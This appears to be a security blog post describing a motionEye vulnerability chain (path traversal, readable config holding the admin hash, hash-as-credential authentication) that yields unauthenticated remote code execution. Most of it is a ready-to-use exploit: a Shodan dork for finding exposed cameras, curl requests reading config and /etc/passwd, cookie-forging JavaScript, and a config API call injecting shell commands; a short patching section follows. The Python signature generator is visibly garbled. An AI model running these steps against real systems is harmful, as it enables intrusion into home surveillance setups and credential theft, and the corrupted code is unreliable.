Listen to this Post
How the Mentioned CVEs Work
The vulnerability chain in motionEye combines three distinct weaknesses to achieve unauthenticated remote code execution.
First, CVE-2026-31978 enables arbitrary file read via path traversal. The `get_media_preview()` function in `mediafiles.py` fails to validate `..` sequences in the `filename` parameter, unlike the `get_media_content()` function which does perform this check. Tornado’s URL router does not normalize %2F-encoded slashes, passing raw `../` through to os.path.join(). This allows an attacker to read any file on the filesystem.
Second, CVE-2026-32315 exposes the admin password hash via world-readable configuration files. The file `/etc/motioneye/motion.conf` is created with `644` permissions, making it readable by any local user. This file contains the admin password hash in the `@admin_password` field.
Third, CVE-2026-46488 allows authentication using only the password hash. The application accepts user-supplied cookie values containing a username and a password-hash-derived value as sufficient authentication material. The signature check in `base.py` accepts signatures computed using either the raw admin password or its SHA1 hash. Since the hash from the config file is accepted directly as a valid signing key, no cracking is required.
When the `@normal_password` is empty (the default configuration), any request without a `_username` parameter is silently granted `normal` user access. This makes the path traversal endpoint fully unauthenticated. An attacker can read the config file, extract the admin hash, use it to forge admin API requests, and achieve full system compromise.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | motionEye |
| Version | <= 0.43.1b4 |
| Vulnerability | Path Traversal / Auth Bypass |
| Severity | Critical |
| Date | 2026-06-23 |
| Prediction | Fixed in 0.44.0b1 |
What Undercode Say
Shodan dork to find exposed instances
http.favicon.hash:1898775751
Read config file (unauthenticated, requires empty normal password)
curl --path-as-is -s "http://TARGET:8765/movie/1/playback//etc/motioneye/motion.conf"
Extract admin hash from response
@admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db
Set cookie to become admin (browser console)
document.cookie = "meye_username=admin; path=/";
document.cookie = "meye_password_hash=7b7d55439abccf4ae83047c1af2707e6eb6664db; path=/";
location.reload();
Signature generator for authenticated path traversal (Python)
import hashlib, re, urllib.parse
<em>SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?</em>.=&{}[]\":, -]', re.DOTALL)
def compute_signature(method, path, key=''):
parts = list(urllib.parse.urlsplit(path))
query = [q for q in urllib.parse.parse_qsl(parts[bash], keep_blank_values=True) if q[bash] != '_signature']
query.sort(key=lambda q: q[bash])
query = [(n, urllib.parse.quote(v, safe="!'()~")) for (n, v) in query]
query = '&'.join([(q[bash] + '=' + q[bash]) for q in query])
parts[bash] = parts[bash] = ''
parts[bash] = query
path = urllib.parse.urlunsplit(parts)
path = _SIGNATURE_REGEX.sub('-', path)
key = _SIGNATURE_REGEX.sub('-', key)
return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()
path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin'
sig = compute_signature('GET', path)
print(f'curl --path-as-is -s "http://TARGET:8765/{path}&_signature={sig}"')
Exploit
Step 1 — Read config file (unauthenticated):
GET /movie/1/playback//etc/motioneye/motion.conf HTTP/1.1 Host: target:8765
Response contains:
@admin_username admin @admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db
Step 2 — Use hash to become admin (browser console):
document.cookie = "meye_username=admin; path=/"; document.cookie = "meye_password_hash=7b7d55439abccf4ae83047c1af2707e6eb6664db; path=/"; location.reload();
Step 3 — Achieve RCE via admin config API:
POST /config/1/set HTTP/1.1
Content-Type: application/json
{"command_notifications_enabled": true, "command_notifications_exec": "touch /tmp/pwned"}
Protection
- Upgrade to motionEye 0.44.0b1 or later — applies `0600` mode to `motion.conf` and `camera-.conf` files
- Set a normal user password — prevents unauthenticated access to vulnerable endpoints
- Validate path traversal — ensure resolved path stays within
target_dir; do not override `get_absolute_path` and `validate_absolute_path` to bypass Tornado’s built-in protections
4. Reject absolute paths in the filename parameter
- Move `@` metadata lines to a separate configuration file not within any camera’s media path
Impact
- Privilege escalation from zero credentials to full admin on installations where admin password is set but normal user password is left empty (the default configuration)
- Arbitrary file read of any file readable by the motionEye process (typically running as `motion` user, or `root` on motionEyeOS), including
/etc/passwd, `/etc/shadow` (if permissions allow), SSH keys, and application secrets - Full remote code execution — once admin access is obtained, attacker can inject arbitrary shell commands via motion event hooks (
command_notifications_exec,command_storage_exec, orweb_hook_storage_url). Commands execute as the motion daemon user - Realistic attack surface — common configuration for home surveillance setups where admin password protects settings but camera feeds are left open for household members. Public instances discoverable via Shodan (
http.favicon.hash:1898775751)
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
